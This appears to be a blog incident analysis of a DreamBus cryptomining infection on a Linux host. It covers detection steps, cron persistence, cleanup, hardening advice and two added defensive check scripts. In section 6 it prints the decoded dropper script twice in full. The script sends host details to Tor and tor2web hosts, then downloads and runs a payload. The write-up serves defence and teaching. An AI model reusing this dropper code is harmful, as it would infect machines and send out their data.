Linux cryptomining malware analysis
Recently my test virtual machine started behaving strangely: there was an odd process named VP0eryom with very high CPU usage. I decided to dig into it and find the cause, and only after looking at the IP the process was connected to did I realise the machine had been infected with cryptomining malware. Below is a brief write-up of the analysis.
1. Finding the abnormal process with top
The process name looks odd (mining malware processes commonly use names like this: 8 random characters).
2. Tracing the process with strace
I tried strace to see what the process was actually doing, and found it constantly calling epoll_pwait:
3. Checking the process's network connections with netstat
Looking up the IP 94.176.237.229 online shows that it is a server associated with mining malware.
4. Listing the files the process has open with lsof
ls -l /proc/28796/exe
This shows the program file of the process: it is the /root/fedd8e32ccb857edb55c14e78ec2591e file in the screenshot, and it is marked as (deleted), meaning the file has already been removed from disk.
Below is the information on the two malware processes on another of my machines:
There is also a file /tmp/.X11-unix/11 whose content is the pid of this process, and a file /tmp/.X11-unix/01 whose content is the pid of the other malware script process; the malware uses these as lock files.
5. Finding the cron job set up by the malware
[root@localhost ~]# crontab -l
7 * * * * /root/.systemd-private-S7vPga3usraBPi9WeyVrgQXZ0fVGN90H.sh > /dev/null 2>&1 &
[root@localhost ~]#
Under /etc/cron.d/ there is a file named 0systemd-private-xxx; cat-ing it shows the same content as the crontab -l output above:
The /root/.systemd-private-xxx.sh file is identical to /opt/systemd-private-xxx.sh.
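The indicators from steps 1 to 5 (a process whose executable was deleted after start, pid lock files under /tmp/.X11-unix, cron jobs and dropped scripts borrowing the systemd-private-* name) can be swept for with a small host check. This is an added example written for this post, not the author's or the malware's code; the ROOT variable and the function names are my own, and the script only reports, it deletes nothing.

```shell
#!/bin/bash
# Host sweep for the DreamBus-style indicators described above (added example, not the post's own code).
# ROOT lets the same checks run against a copied or constructed tree; empty means the live system.
ROOT="${ROOT:-}"

# Processes whose binary was removed after start: readlink shows "... (deleted)", like /root/fedd8e... above.
deleted_exes() {
  local p target
  for p in "$ROOT"/proc/[0-9]*; do
    [ -L "$p/exe" ] || continue
    target=$(readlink "$p/exe" 2>/dev/null) || continue   # fails for other users' processes without root
    case "$target" in
      *' (deleted)') echo "${p##*/} $target" ;;
    esac
  done
}

# Regular files under /tmp/.X11-unix holding a bare pid (the 01/11 lock files);
# legitimate entries there are X server sockets, not regular files.
pid_lockfiles() {
  local f pid
  for f in "$ROOT"/tmp/.X11-unix/*; do
    [ -f "$f" ] || continue
    pid=$(head -n 1 "$f" 2>/dev/null)
    case "$pid" in
      '' | *[!0-9]*) continue ;;
    esac
    echo "$f pid=$pid"
  done
}

# Cron entries and dropped scripts that borrow the systemd-private-* name.
# /tmp/systemd-private-*/ directories are legitimate (PrivateTmp), so only cron and these paths are checked.
cron_persistence() {
  local f
  grep -rls 'systemd-private' "$ROOT"/etc/cron.d "$ROOT"/var/spool/cron "$ROOT"/etc/crontab
  for f in "$ROOT"/opt/systemd-private-*.sh "$ROOT"/opt/systemd-service.sh "$ROOT"/root/.systemd-private-*.sh; do
    [ -f "$f" ] && echo "$f"
  done
  return 0
}

report() {
  echo "== processes with deleted executables"; deleted_exes
  echo "== pid lock files in /tmp/.X11-unix";    pid_lockfiles
  echo "== systemd-private persistence";        cron_persistence
}

# Report only (nothing is killed or deleted). Run as: bash dreambus_check.sh scan
[ "${1:-}" = "scan" ] && report
```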
6. Decoding the mining malware script
Looking at the content of the script file referenced by the cron job above:
After decoding it with the base64 tool:
Here is the decoded content:
S7vPga3usraBPi9WeyVrgQXZ0fVGN90H
exec &>/dev/null
export PATH=$PATH:$HOME:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin
d=$(grep x:$(id -u): /etc/passwd|cut -d: -f6)
c=$(echo "curl -4fsSLkA- -m200")
t=$(echo "asbrvuy5eytinisxv7jzno26lererj55ryvomhht6iw7tmcbbyswebid")
sockz() {
n=(dns.digitale-gesellschaft.ch doh.li doh.pub fi.doh.dns.snopyta.org hydra.plan9-ns1.com resolver-eu.lelux.fi dns.hostux.net dns.twnic.tw doh-fi.blahdns.com resolver-eu.lelux.fi doh.li dns.digitale-gesellschaft.ch)
p=$(echo "dns-query?name=relay.tor2socks.in")
q=${n[$((RANDOM%${#n[@]}))]}
s=$($c https://$q/$p | grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" |tr ' ' '\n'|grep -Ev [.]0|sort -uR|tail -1)
}
fexe() {
for i in . $HOME /usr/bin $d /var/tmp ;do echo exit > $i/i && chmod +x $i/i && cd $i && ./i && rm -f i && break;done
}
u() {
sockz
f=/int.$(uname -m)
x=./$(date|md5sum|cut -f1 -d-)
r=$(curl -4fsSLk checkip.amazonaws.com||curl -4fsSLk ip.sb)_$(whoami)_$(uname -m)_$(uname -n)_$(ip a|grep 'inet '|awk {'print $2'}|md5sum|awk {'print $1'})_$(crontab -l|base64 -w0)
$c -x socks5h://$s:9050 $t.onion$f -o$x -e$r || $c $1$f -o$x -e$r
chmod +x $x;$x;rm -f $x
}
for h in tor2web.in tor2web.it
do
if ! ls /proc/$(head -n 1 /tmp/.X11-unix/01)/status; then
fexe;u $t.$h
ls /proc/$(head -n 1 /tmp/.X11-unix/01)/status || (cd /tmp;u $t.$h)
ls /proc/$(head -n 1 /tmp/.X11-unix/01)/status || (cd /dev/shm;u $t.$h)
else
break
fi
done
A brief walkthrough of the script:
① exec &>/dev/null keeps the script silent: from that point on all output (stdout and stderr) goes to /dev/null, so nothing is ever printed (the cron entry above already launches it in the background with &)
② d=$(grep x:$(id -u): /etc/passwd|cut -d: -f6) looks up the current user's $HOME path in /etc/passwd
③ c=$(echo "curl -4fsSLkA- -m200") defines the curl command; the sockz function below uses it to resolve the IPv4 address of relay.tor2socks.in over DNS-over-HTTPS, picking at random one of the following resolvers:
dns.digitale-gesellschaft.ch
doh.li
doh.pub
fi.doh.dns.snopyta.org
hydra.plan9-ns1.com
resolver-eu.lelux.fi
dns.hostux.net
dns.twnic.tw
doh-fi.blahdns.com
resolver-eu.lelux.fi
doh.li
dns.digitale-gesellschaft.ch
For example:
[root@localhost ~]# curl -4fsSLkA- -m200 https://doh.pub/dns-query?name=relay.tor2socks.in
{"Status":0,"TC":false,"RD":true,"RA":true,"AD":false,"CD":false,"Question":[{"name":"relay.tor2socks.in.","type":1}],"Answer":[{"name":"relay.tor2socks.in.","type":1,"TTL":25,"Expires":"Mon, 20 Dec 2021 15:13:07 UTC","data":"139.177.194.70"}],"edns_client_subnet":"119.28.122.4/0"}
[root@localhost ~]#
[root@localhost ~]# $c https://$q/$p | grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" |tr ' ' '\n'|grep -Ev [.]0|sort -uR|tail -1
139.177.194.70
④ The fexe function creates a file named i containing exit in the user's home directory, /tmp, /var/tmp and /usr/bin, then tries to execute it and deletes it. This is how the malware finds a directory in which it can both write and execute files.
⑤ The u function sends an HTTP request to the /cmd path, then to the hard-coded TOR domains, then runs the downloaded file and deletes it afterwards.
The command curl -4fsSLk checkip.amazonaws.com || curl -4fsSLk ip.sb is used to obtain the machine's public IP address.
On another infected machine I also found a systemd-service.sh file under /opt; its content is much the same as the script analysed above:
[root@localhost ~]# cat /opt/systemd-service.sh
#!/bin/bash
exec &>/dev/null
echo nR5+1jkQQI+7TgJbl1oPCUWmJ4txeU1yoaDfvYVyk3S40XkQYcfH6obd7/MO/1Tt
echo <base64 payload omitted>|base64 -d|bash
[root@localhost ~]#
[root@localhost ~]# echo <base64 payload omitted>|base64 -d
nR5+1jkQQI+7TgJbl1oPCUWmJ4txeU1yoaDfvYVyk3S40XkQYcfH6obd7/MO/1Tt
exec &>/dev/null
export PATH=$PATH:$HOME:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin
d=$(grep x:$(id -u): /etc/passwd|cut -d: -f6)
c=$(echo "curl -4fsSLkA- -m200")
t=$(echo "ji55jjplpknk7eayxxtb5o3ulxuevntutsdanov5dp3wya7l7btjv4qd")
sockz() {
n=(doh.nl.ahadns.net dns.hostux.net uncensored.lux1.dns.nixnet.xyz dns.rubyfish.cn dns.twnic.tw doh.no.ahadns.net doh-fi.blahdns.com fi.doh.dns.snopyta.org resolver-eu.lelux.fi doh.li dns.digitale-gesellschaft.ch)
p=$(echo "dns-query?name=relay.tor2socks.in")
s=$($c https://${n[$((RANDOM%11))]}/$p | grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" |tr ' ' '\n'|grep -Ev [.]0|sort -uR|head -n 1)
}
fexe() {
for i in . $HOME /usr/bin $d /var/tmp ;do echo exit > $i/i && chmod +x $i/i && cd $i && ./i && rm -f i && break;done
}
u() {
sockz
f=/int.$(uname -m)
x=./$(date|md5sum|cut -f1 -d-)
r=$(curl -4fsSLk checkip.amazonaws.com||curl -4fsSLk ip.sb)_$(whoami)_$(uname -m)_$(uname -n)_$(ip a|grep 'inet '|awk {'print $2'}|md5sum|awk {'print $1'})_$(crontab -l|base64 -w0)
$c -x socks5h://$s:9050 $t.onion$f -o$x -e$r || $c $1$f -o$x -e$r
chmod +x $x;$x;rm -f $x
}
for h in tor2web.in tor2web.it onion.foundation onion.com.de onion.sh tor2web.su
do
if ! ls /proc/$(head -n 1 /tmp/.X11-unix/01)/status; then
fexe;u $t.$h
ls /proc/$(head -n 1 /tmp/.X11-unix/01)/status || (cd /tmp;u $t.$h)
ls /proc/$(head -n 1 /tmp/.X11-unix/01)/status || (cd /dev/shm;u $t.$h)
else
break
fi
done
[root@localhost ~]#
7. Checking the system audit log for SSH brute-force attempts
The log shows another host brute-forcing SSH against this machine; after more than a thousand attempts it finally succeeded.
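The brute-force-then-success pattern from the audit log can be pulled out of raw auditd USER_LOGIN records without a GUI by counting failed and successful sshd logins per source address. Added example, not from the original post; the audit lines below are constructed in the format auditd writes for sshd, and the 192.0.2.x, 198.51.100.x and 203.0.113.x addresses are documentation ranges.

```shell
#!/bin/bash
# Summarise sshd login results from raw auditd USER_LOGIN records (added example, not from the post).
# Live use: ausearch -m USER_LOGIN --raw | brute_force_success 100

# Constructed sample in the format auditd writes for sshd; addresses are from documentation ranges.
sample_audit() {
cat <<'EOF'
type=USER_LOGIN msg=audit(1639990001.101:2001): pid=3001 uid=0 auid=4294967295 ses=4294967295 msg='op=login acct="root" exe="/usr/sbin/sshd" hostname=? addr=192.0.2.10 terminal=ssh res=failed'
type=USER_LOGIN msg=audit(1639990002.102:2002): pid=3002 uid=0 auid=4294967295 ses=4294967295 msg='op=login acct="admin" exe="/usr/sbin/sshd" hostname=? addr=192.0.2.10 terminal=ssh res=failed'
type=USER_LOGIN msg=audit(1639990003.103:2003): pid=3003 uid=0 auid=4294967295 ses=4294967295 msg='op=login acct="root" exe="/usr/sbin/sshd" hostname=? addr=192.0.2.10 terminal=ssh res=failed'
type=USER_LOGIN msg=audit(1639990004.104:2004): pid=3004 uid=0 auid=4294967295 ses=4294967295 msg='op=login acct="root" exe="/usr/sbin/sshd" hostname=? addr=198.51.100.7 terminal=ssh res=failed'
type=USER_LOGIN msg=audit(1639990005.105:2005): pid=3005 uid=0 auid=0 ses=12 msg='op=login id=0 exe="/usr/sbin/sshd" hostname=192.0.2.10 addr=192.0.2.10 terminal=/dev/pts/1 res=success'
type=USER_LOGIN msg=audit(1639990006.106:2006): pid=3006 uid=0 auid=1000 ses=13 msg='op=login id=1000 exe="/usr/sbin/sshd" hostname=203.0.113.5 addr=203.0.113.5 terminal=/dev/pts/2 res=success'
type=CRED_ACQ msg=audit(1639990006.107:2007): pid=3006 uid=0 auid=1000 ses=13 msg='op=PAM:setcred grantors=pam_unix acct="user" exe="/usr/sbin/sshd" hostname=203.0.113.5 addr=203.0.113.5 terminal=ssh res=success'
EOF
}

# Per-source counts of failed and successful sshd logins: "addr failed=N success=M", sorted by address.
ssh_login_summary() {
  awk '
    /type=USER_LOGIN/ && /exe="\/usr\/sbin\/sshd"/ {
      addr = ""; res = ""
      for (i = 1; i <= NF; i++) {
        if ($i ~ /^addr=/) addr = substr($i, 6)
        if ($i ~ /^res=/)  res  = substr($i, 5)
      }
      gsub(/[^a-z]/, "", res)            # drop the closing quote of the msg=... field
      if (addr == "" || res == "") next
      if (res == "failed")  failed[addr]++
      if (res == "success") ok[addr]++
      seen[addr] = 1
    }
    END { for (a in seen) printf "%s failed=%d success=%d\n", a, failed[a], ok[a] }
  ' | sort
}

# Sources with at least $1 failures that later logged in successfully: the pattern seen in the audit log above.
brute_force_success() {
  local threshold="${1:-100}"
  ssh_login_summary | awk -v t="$threshold" '{
    split($2, f, "="); split($3, s, "=")
    if (f[2] + 0 >= t && s[2] + 0 > 0) print $1 " brute-forced: " f[2] " failures then success"
  }'
}

# Demo on the constructed sample: bash ssh_audit.sh demo
[ "${1:-}" = "demo" ] && sample_audit | brute_force_success 3
```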
8. Removing the malware files
① Remove the cron jobs
Use crontab -e to delete the scheduled task
Delete the 0systemd-private-xxx file under /etc/cron.d/
② Delete the systemd-private-xxxx.sh and systemd-service.sh files under /opt/
[root@localhost ~]# ll /opt/systemd-*
-rwxr-xr-x. 1 root root 2023 Aug 3 2017 /opt/systemd-private-XewOnVlZVlcq2RdzuRgG1iX0mneBTh3.sh
-rwxr-xr-x. 1 root root 2124 Aug 3 2017 /opt/systemd-service.sh
[root@localhost ~]#
③ Delete the .systemd-private-xxxx.sh file under $HOME
④ kill -9 the malware processes; there are usually two long-running ones, both with the same naming pattern (8 characters)
[root@localhost ~]# rm -rf /opt/systemd-private-S7vPga3usraBPi9WeyVrgQXZ0fVGN90H.sh
[root@localhost ~]# rm -rf /etc/cron.d/
0systemd-private-S7vPga3usraBPi9WeyVrgQXZ0fVGN90H raid-check
[root@localhost ~]# rm -rf /etc/cron.d/0systemd-private-S7vPga3usraBPi9WeyVrgQXZ0fVGN90H
[root@localhost ~]#
[root@localhost ~]# rm -rf /root/.systemd-private-S7vPga3usraBPi9WeyVrgQXZ0fVGN90H.sh
[root@localhost ~]#
After cleanup, it is best to reboot.
9. Security measures
① Use strong, non-patterned passwords on hosts, rotate them periodically, and do not reuse the same password across servers.
② Deploy security protection and monitoring so that infections are detected early and handled promptly.
For a more in-depth analysis, see the Zscaler blog post Malware Analysis of the DreamBus Botnet | Zscaler Blog.